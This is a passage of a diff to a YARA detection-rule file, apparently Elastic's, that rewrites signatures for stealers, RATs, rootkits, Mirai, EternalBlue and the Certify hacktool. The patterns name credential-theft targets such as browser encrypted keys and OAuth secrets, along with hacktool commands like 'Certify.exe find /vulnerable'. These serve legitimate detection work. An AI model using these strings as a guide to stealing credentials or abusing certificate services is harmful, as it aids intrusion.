"81936e696a525cf02070fa7cfa27574cdad37e1b3d8f278950390a1945c21611" + fingerprint = "4909d3a04b820547fbff774c64c112b8a6a5e95452992639296a220776826d98" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -76975,39 +77116,28 @@ rule ELASTIC_Linux_Hacktool_Fontonlake_68Ad8568 : FILE MEMORY os = "linux" strings: - $s1 = "run_in_bash" - $s2 = "run_in_ss" - $s3 = "real_bash_fork" - $s4 = "fake_bash_add_history" - $s5 = "hook_bash_add_history" - $s6 = "real_bash_add_history" - $s7 = "real_current_user.5417" - $s8 = "real_bash_execve" - $s9 = "inject_so_symbol.c" - $s10 = "/root/rmgr_ko/subhook-0.5/subhook_x86.c" - $s11 = "|1|%ld|%d|%d|%d|%d|%s|%s" - $s12 = "/proc/.dot3" + $a = { 45 E8 76 0F 48 8B 45 E8 48 83 E8 01 0F B6 00 3C 5F 74 DF 48 8B } condition: - 4 of them + all of them } -rule ELASTIC_Windows_Trojan_Oskistealer_A158B1E3 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Certify_Ffe1Cca2 : FILE MEMORY { meta: - description = "Detects Windows Trojan Oskistealer (Windows.Trojan.OskiStealer)" + description = "Detects Windows Hacktool Certify (Windows.Hacktool.Certify)" author = "Elastic Security" - id = "a158b1e3-21b7-4009-9646-6bee9bde98ad" - date = "2022-03-21" - modified = "2022-04-12" + id = "ffe1cca2-106c-4197-9d26-eb90331435d9" + date = "2024-03-27" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_OskiStealer.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "568cd515c9a3bce7ef21520761b02cbfc95d8884d5b2dc38fc352af92356c694" - logic_hash = "0ddbe0b234ed60f5a3fc537cdaebf39f639ee24fd66143c9036a9f4786d4c51b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Certify.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3c7f759a6c38d0c0780fba2d43be6dcf9e4869d54b66f16c0703ec8e58124953" + logic_hash = "e1d37ad683bfbe34433dc5e13ae2cf7c873fed640e1c58a3b0274b4b34900e53" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "3996a89d37494b118654f3713393f415c662850a5a76afa00e83f9611aee3221" + fingerprint = "69f5648f1a9621fe33e63c150d184cb89ceef472885a928aa501a08d8069234d" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -77015,193 +77145,182 @@ rule ELASTIC_Windows_Trojan_Oskistealer_A158B1E3 : FILE MEMORY os = "windows" strings: - $a1 = "\"os_crypt\":{\"encrypted_key\":\"" ascii fullword - $a2 = "%s / %s" ascii fullword - $a3 = "outlook.txt" ascii fullword - $a4 = "GLoX6gmCFw==" ascii fullword - $a5 = "KaoQpEzKSjGm8Q==" ascii fullword + $a1 = "b_" + $a2 = "b_" + $a3 = "b_" + $a4 = "b_" + $a5 = "b_" + $b1 = "64524ca5-e4d0-41b3-acc3-3bdbefd40c97" ascii wide nocase + $b2 = "64524CA5-E4D0-41B3-ACC3-3BDBEFD40C97" ascii wide nocase + $b3 = "Certify.exe find /vulnerable" wide + $b4 = "Certify.exe request /ca" wide condition: - all of them + all of ($a*) or any of ($b*) } -rule ELASTIC_Windows_Vulndriver_Iobitunlocker_Defb90Fd : FILE +rule ELASTIC_Linux_Rootkit_Adore_Fe3Fd09F : FILE MEMORY { meta: - description = "Name: IObitUnlocker.sys, Version: 1.0.X.Y to 1.3.X.Y" + description = "Detects Linux Rootkit Adore (Linux.Rootkit.Adore)" author = "Elastic Security" - id = "defb90fd-d2ac-4168-b248-f698b590a63f" - date = "2023-07-25" - modified = "2023-07-25" - reference = "https://theevilbit.github.io/posts/iobit_unlocker_lpe/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0aff83f28d70f425539fee3d6a780210d0406264f8a4eb124e32b074e8ffd556" - hash = "5ce1a8eac73ef1d0741f34d9fb2661da322117a63bffe60ccad092da89664c42" - logic_hash = "4b0f440c66b7c9a193f0d6675c2a4246036ebc5c0c83856f45ec40a041e9cd07" + id = "fe3fd09f-d170-4bb0-bc8d-6d61bdc22164" + date = "2021-04-06" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Rootkit_Adore.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f4e532b840e279daf3d206e9214a1b065f97deb7c1487a34ac5cbd7cbbf33e1a" + logic_hash = "cc07efb9484562cd870649a38126f08aa4e99ed5ad4662ece0488d9ffd97520e" score = 75 quality = 75 - tags = "FILE" - fingerprint = "a2015ef9d0f3f5de47cd5c9a64953aef7a860d5cbd7e176df601c67c89294e4f" - threat_name = "Windows.VulnDriver.IoBitUnlocker" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "2bab2a4391359c6a7148417b010887d0754b91ac99820258e849e81f7752069f" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 [1-4] 49 00 4F 00 62 00 69 00 74 00 55 00 6E 00 6C 00 6F 00 63 00 6B 00 65 00 72 00 2E 00 73 00 79 00 73 } - $product_version = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 [1-4] 31 00 2E 00 ( 30 | 31 | 32 | 33 ) 00 } - $subject = { 06 03 55 04 0A [2] 49 4F 62 69 74 20 49 6E 66 6F 72 6D 61 74 69 6F 6E 20 54 65 63 68 6E 6F 6C 6F 67 79 } - $pdb_filename = "IObitUnlocker.pdb" fullword + $a = { 89 C0 89 45 F4 83 7D F4 00 75 17 68 E4 A1 04 08 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and (($original_file_name and $product_version) or ($subject and $pdb_filename)) + all of them } -rule ELASTIC_Windows_Vulndriver_Amifldrv_E387D5Ad : FILE +rule ELASTIC_Linux_Trojan_Setag_351Eeb76 : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Amifldrv (Windows.VulnDriver.Amifldrv)" + description = "Detects Linux Trojan Setag (Linux.Trojan.Setag)" author = "Elastic Security" - id = "e387d5ad-fde8-401b-bdcf-044c4f7f5fbd" - date = "2022-04-04" - modified = "2022-04-04" + id = "351eeb76-ccca-40d5-8ee3-e8daf6494dda" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Amifldrv.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330" - logic_hash = "14d75b5aff2c82d69b041c654cdc0840f6b6e37a197f5c0c1c2698c9e8eba3e2" - score = 60 - quality = 55 - tags = "FILE" - fingerprint = "03f898088f37f3c9991fb70d7fb8548908cfac4e03bb2bfe88b11a65157909a8" - severity = 50 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Setag.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "3519d9e4bfa18c19b49d0fa15ef78151bd13db9614406c4569720d20830f3cbb" + score = 75 + quality = 75 + tags = "FILE, MEMORY" + fingerprint = "c6edc7ae898831e9cc3c92fcdce4cd5b4412de061575e6da2f4e07776e0885f5" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "\\amifldrv64.pdb" + $a = { 04 8B 45 F8 C1 E0 02 01 C2 8B 45 EC 89 02 8D 45 F8 FF 00 8B } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 + all of them } -rule ELASTIC_Windows_Ransomware_Avoslocker_7Ae4D4F2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Setag_01E2F79B : FILE MEMORY { meta: - description = "Detects Windows Ransomware Avoslocker (Windows.Ransomware.Avoslocker)" + description = "Detects Linux Trojan Setag (Linux.Trojan.Setag)" author = "Elastic Security" - id = "7ae4d4f2-be5f-4aad-baaa-4182ff9cf996" - date = "2021-07-28" - modified = "2021-08-23" + id = "01e2f79b-fcbc-41d0-a68b-3a692b893f26" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Avoslocker.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856" - logic_hash = "c87faf6f128fd6a8cabd68ec8de72fb10e6be42bdbe23ece374dd8f3cf0c1b15" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Setag.yar#L20-L38" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5b5e8486174026491341a750f6367959999bbacd3689215f59a62dbb13a45fcc" + logic_hash = "1e0336760f364acbbe0e8aec10bc7bfb48ed7e33cde56d8914617664cb93fd9b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0e5ff268ed2b62f9d31df41192135145094849a4e6891407568c3ea27ebf66bb" + fingerprint = "4ea87a6ccf907babdebbbb07b9bc32a5437d0213f1580ea4b4b3f44ce543a5bd" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "drive %s took %f seconds" ascii fullword - $a2 = "client_rsa_priv: %s" ascii fullword - $a3 = "drive: %s" ascii fullword - $a4 = "Map: %s" ascii fullword - $a5 = "encrypting %ls failed" wide fullword + $a = { 0C 8B 45 EC 89 45 FC 8D 55 E8 83 EC 04 8D 45 F8 50 8D 45 FC } condition: all of them } -rule ELASTIC_Linux_Trojan_Shellbot_65Aa6568 : FILE MEMORY +rule ELASTIC_Windows_Exploit_Eternalblue_Ead33Bf8 : FILE { meta: - description = "Detects Linux Trojan Shellbot (Linux.Trojan.Shellbot)" + description = "Detects Windows Exploit Eternalblue (Windows.Exploit.Eternalblue)" author = "Elastic Security" - id = "65aa6568-491a-4a51-b921-c6c228cfca11" + id = "ead33bf8-1870-4d01-a223-edcbe262542f" date = "2021-01-12" - modified = "2021-09-16" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Shellbot.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "457d1f4e1db41a9bdbfad78a6815f42e45da16ad0252673b9a2b5dcefc02c47b" - logic_hash = "46558801151ddc2f25bf46a278719f027acca2a18d2a9fcb275f4d787fbb1f0b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Exploit_Eternalblue.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a1340e418c80be58fb6bbb48d4e363de8c6d62ea59730817d5eda6ba17b2c7a7" + logic_hash = "4d0ab8bd7ef5b20e656110ac3c78b08803539387cb4fe1425a284d39c42aa199" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "2cd606ecaf17322788a5ee3b6bd663bed376cef131e768bbf623c402664e9270" + tags = "FILE" + fingerprint = "9e3b5f4f0b8ac683544886abbd9eecbf0253a7992ee5d99c453de67b9aacdccd" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 72 00 73 74 72 63 6D 70 00 70 61 6D 5F 70 72 6F 6D 70 74 00 } + $a = { F8 31 C9 EB 0B 40 8A 3C 0E 40 88 3C 08 48 FF C1 48 39 D1 75 } condition: all of them } -rule ELASTIC_Windows_Backdoor_Goldbackdoor_91902940 : FILE MEMORY +rule ELASTIC_Multi_Trojan_Sparkrat_9A21E541 : FILE MEMORY { meta: - description = "Detects Windows Backdoor Goldbackdoor (Windows.Backdoor.Goldbackdoor)" + description = "Detects Multi Trojan Sparkrat (Multi.Trojan.SparkRat)" author = "Elastic Security" - id = "91902940-a291-4fc6-81c5-2cde2328e8d9" - date = "2022-04-29" - modified = "2022-06-09" + id = "9a21e541-886c-4d7f-8602-832862121730" + date = "2023-11-13" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Backdoor_Goldbackdoor.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "485246b411ef5ea9e903397a5490d106946a8323aaf79e6041bdf94763a0c028" - logic_hash = "71e26cce6d730560e1303b2a4f49d0da6d1341263bb47ade46338f03e528cbf7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Trojan_SparkRat.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "23efecc03506a9428175546a4b7d40c8a943c252110e83dec132c6a5db8c4dd6" + logic_hash = "903c5c65436bea8dd044fd5f1f6dda3d1e90ab25802d508f67ba0f7fd06e92d4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "83a404a24e54bd05319d3df3a830f1ffe51d30f71ca55d63ca152d5169511df4" + fingerprint = "2691da3a037b651d0f7f6d7be767c34845c3b9a642f4a2fb1c54f391f08089b6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "multi" strings: - $pdf = "D:\\Development\\GOLD-BACKDOOR\\" - $agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.3112.113 Safari/537.36" - $str0 = "client_id" - $str1 = "client_secret" - $str2 = "redirect_uri" - $str3 = "refresh_token" - $a = { 56 57 8B 7D 08 8B F1 6A 00 6A 00 6A 00 6A 00 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 46 30 85 C0 75 ?? 33 C0 5F 5E } - $b = { 66 8B 02 83 C2 02 66 85 C0 75 ?? 2B D1 D1 FA 75 ?? 33 C0 E9 ?? ?? ?? ?? 6A 40 8D 45 ?? 6A 00 50 E8 } + $a1 = "Spark/client/service/file" ascii wide + $a2 = "Spark/client/service/desktop" ascii wide + $a3 = "Spark/utils.Encrypt" ascii wide condition: - ($pdf and $agent) or ( all of ($str*) and $a and $b) + all of them } -rule ELASTIC_Windows_Backdoor_Goldbackdoor_F11D57Df : FILE MEMORY +rule ELASTIC_Windows_Trojan_Xtremerat_Cd5B60Be : FILE MEMORY { meta: - description = "Detects Windows Backdoor Goldbackdoor (Windows.Backdoor.Goldbackdoor)" + description = "Detects Windows Trojan Xtremerat (Windows.Trojan.XtremeRAT)" author = "Elastic Security" - id = "f11d57df-8dd4-481c-a557-f83ae05d53fe" - date = "2022-04-29" - modified = "2022-06-09" + id = "cd5b60be-4685-425a-8fe1-8366c0e5b84a" + date = "2022-03-15" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Backdoor_Goldbackdoor.yar#L28-L51" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "45ece107409194f5f1ec2fbd902d041f055a914e664f8ed2aa1f90e223339039" - logic_hash = "6401b215523289a3842dec6d3e016a2ca99512c5889e87cb5ff13023bb0b8e1e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_XtremeRAT.yar#L1-L28" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "735f7bf255bdc5ce8e69259c8e24164e5364aeac3ee78782b7b5275c1d793da8" + logic_hash = "a6997ae4842bd45c440925ef2a5848b57c58e2373c0971ce6b328ea297ee97b4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fed0317d43910d962908604812c2cd1aff6e67f7e245c82b39f2ac6dc14b6edb" + fingerprint = "2ee35d7c34374e9f5cffceb36fe1912932288ea4e8211a8b77430b98a9d41fb2" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -77209,119 +77328,141 @@ rule ELASTIC_Windows_Backdoor_Goldbackdoor_F11D57Df : FILE MEMORY os = "windows" strings: - $a = { C7 45 ?? 64 69 72 25 C7 45 ?? 5C 53 79 73 C7 45 ?? 74 65 6D 33 C7 45 ?? 32 5C 00 00 C7 45 ?? 2A 2E 65 78 C7 45 ?? 65 00 00 00 E8 ?? ?? ?? ?? FF D0 } - $b = { B9 18 48 24 9D E8 ?? ?? ?? ?? FF D0 } - $c = { B9 F8 92 FA 98 E8 ?? ?? ?? ?? FF D0 } - $a1 = { 64 A1 30 00 00 00 53 55 56 } - $b1 = { B9 76 DB 7A AA 6A 40 68 00 30 00 00 FF 75 ?? 50 E8 ?? ?? ?? ?? FF D0 } - $c1 = { B9 91 51 13 EE 50 68 80 00 00 00 6A 04 50 50 ?? ?? ?? ?? ?? ?? ?? 6A 04 50 E8 ?? ?? ?? ?? FF D0 } + $s01 = "SOFTWARE\\XtremeRAT" wide fullword + $s02 = "XTREME" wide fullword + $s03 = "STARTSERVERBUFFER" wide fullword + $s04 = "ENDSERVERBUFFER" wide fullword + $s05 = "ServerKeyloggerU" ascii fullword + $s06 = "TServerKeylogger" ascii fullword + $s07 = "XtremeKeylogger" wide fullword + $s08 = "XTREMEBINDER" wide fullword + $s09 = "UnitInjectServer" ascii fullword + $s10 = "shellexecute=" wide fullword condition: - all of them + 7 of ($s*) } -rule ELASTIC_Linux_Trojan_Mirai_268Aac0B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Siestagraph_8C36Ddc1 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Siestagraph (Windows.Trojan.SiestaGraph)" author = "Elastic Security" - id = "268aac0b-c5c7-4035-8381-4e182de91e32" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead" - logic_hash = "6eae3aba35d3379fa194b66a1b4e0d78d0d0b88386cd4ea5dfeb3c072642c7ba" + id = "8c36ddc1-c7fa-4c25-a05c-59c29e4e7c31" + date = "2022-12-14" + modified = "2022-12-15" + reference = "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SiestaGraph.yar#L1-L28" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54" + logic_hash = "17ce8090b88100f00c07df0599cd51dc7682f4c43de989ce58621df97eca42fb" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "9c581721bf82af7dc6482a2c41af5fb3404e01c82545c7b2b29230f707014781" + fingerprint = "a76d2b45261da65215797a4792a3aae5051d88ba15d01b24487c83d6a38b9ff7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 24 18 0F B7 44 24 20 8B 54 24 1C 83 F9 01 8B 7E 0C 89 04 24 8B } + $a1 = "downloadAsync" ascii nocase fullword + $a2 = "UploadxAsync" ascii nocase fullword + $a3 = "GetAllDriveRootChildren" ascii fullword + $a4 = "GetDriveRoot" ascii fullword + $a5 = "sendsession" wide fullword + $b1 = "ListDrives" wide fullword + $b2 = "Del OK" wide fullword + $b3 = "createEmailDraft" ascii fullword + $b4 = "delMail" ascii fullword condition: - all of them + all of ($a*) and 2 of ($b*) } -rule ELASTIC_Linux_Trojan_Mirai_D5F2Abe2 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Siestagraph_Ad3Fe5C6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Siestagraph (Windows.Trojan.SiestaGraph)" author = "Elastic Security" - id = "d5f2abe2-511f-474d-9292-39060bbf6feb" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c490586fbf90d360cf3b2f9e2dc943809441df3dfd64dadad27fc9f5ee96ec74" - logic_hash = "169e7e5d1a7ea8c219464e22df9be8bc8caa2e78e1bc725674c8e0b14f6b9fc5" + id = "ad3fe5c6-88ba-46cf-aefd-bd8ab0eff917" + date = "2023-09-12" + modified = "2023-09-20" + reference = "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SiestaGraph.yar#L30-L56" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb" + logic_hash = "b625221b77803c2c052db09c90a76666cf9e0ae34cb0d59ae303e890e646e94b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "475a1c92c0a938196a5a4bca708b338a62119a2adf36cabf7bc99893fee49f2a" + fingerprint = "653ca92d31c7212c1f154c2e18b3be095e9a39fe482ce99fbd84e19f4bf6ca64" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 41 56 41 89 FE 40 0F B6 FF 41 55 49 89 F5 BE 08 00 00 00 41 54 41 } + $a1 = "GetAllDriveRootChildren" ascii fullword + $a2 = "GetDriveRoot" ascii fullword + $a3 = "sendsession" wide fullword + $b1 = "status OK" wide fullword + $b2 = "upload failed" wide fullword + $b3 = "Failed to fetch file" wide fullword + $c1 = "Specified file doesn't exist" wide fullword + $c2 = "file does not exist" wide fullword condition: - all of them + 6 of them } -rule ELASTIC_Linux_Trojan_Mirai_1Cb033F3 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Siestagraph_D801Ce71 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Siestagraph (Windows.Trojan.SiestaGraph)" author = "Elastic Security" - id = "1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L41-L58" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "ebaf45ce58124aa91b07ebb48779e6da73baa0b80b13e663c13d8fb2bb47ad0d" + id = "d801ce71-2e3d-47bb-a194-c68b437d8ecc" + date = "2023-09-12" + modified = "2023-09-20" + reference = "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SiestaGraph.yar#L58-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb" + logic_hash = "c2d00d64d69cb5d24d76f6c551b49aa1acef1e1bab96f7ed7facc148244a8370" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358" + fingerprint = "8e1d95313526650c2fa3dd00e779aec0e62d1a2273722ad913100eab003fc8b6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C3 EB 06 8A 46 FF 88 47 FF FF CA 48 FF C7 48 FF C6 83 FA FF } + $hashgenfunc = { 02 2C ?? 20 [4] 0A 16 0B 2B ?? 02 07 6F [4] 06 61 20 [4] 5A 0A 07 17 58 0B 07 02 6F [4] 32 ?? } + $sendpostfunc = { 72 [4] 72 [4] 72 [4] 02 73 [4] 73 [4] 28 [4] 0A 72 [4] 72 [4] 06 28 [4] 2A } + $command15 = { 25 16 1F 3A 9D 6F [4] 17 9A 13 ?? 11 ?? 28 [4] 13 ?? 11 ?? 28 [4] 11 ?? 28 [4] 2C 33 28 [4] 28 [4] 6F [4] 6F [4] 11 ?? 28 [4] 09 7B [4] 18 9A 72 [4] 72 [4] 28 [4] 26 DE } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_Fa3Ad9D0 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2022_0847_E831C285 : FILE MEMORY CVE_2022_0847 { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Exploit Cve 2022 0847 (Linux.Exploit.CVE-2022-0847)" author = "Elastic Security" - id = "fa3ad9d0-7c55-4621-90fc-6b154c44a67b" - date = "2021-01-12" - modified = "2021-09-16" + id = "e831c285-b2b9-49f3-a87c-3deb806e31e4" + date = "2022-03-10" + modified = "2022-03-14" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L60-L78" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" - logic_hash = "5890c85872ea4508e673235b20b481972f613f6e5f9564c0237c458995532347" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2022_0847.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c6b2cef2f2bc04e3ae33e0d368eb39eb5ea38d1bca390df47f7096117c1aecca" + logic_hash = "e15daf5de9bf66060e373a6e772669eade543ed56bef6b6924a0ee44e59522e1" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca" + tags = "FILE, MEMORY, CVE-2022-0847" + fingerprint = "376b791f9bb5f48d0f41ead4e48b5bcc74cb68002bb7c170760428ace169457e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -77329,894 